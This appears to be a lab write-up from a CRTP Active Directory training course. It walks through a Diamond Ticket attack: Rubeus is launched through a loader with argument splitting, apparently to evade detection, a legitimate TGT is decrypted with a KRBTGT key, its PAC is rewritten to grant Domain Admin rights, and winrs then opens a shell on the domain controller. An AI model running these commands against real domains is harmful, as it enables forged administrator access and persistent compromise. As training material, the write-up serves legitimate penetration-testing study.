CRTP Lab 10
Task
Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack
We can use Rubeus for the Diamond Ticket attack. Unlike a Golden Ticket, which forges a TGT from scratch, a Diamond Ticket starts from a legitimately issued TGT: Rubeus requests one (/tgtdeleg), decrypts it with the KRBTGT key, modifies the PAC (here the ticket user becomes administrator with RID 500 and group 512, Domain Admins) and re-encrypts it with the same key.
Open a DA shell and use the KRBTGT key to modify and sign the TGT.
# ArgSplit for "diamond"
# Use Rubeus with Loader
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Access the DC using winrs from the spawned process:
winrs -r:dcorp-dc cmd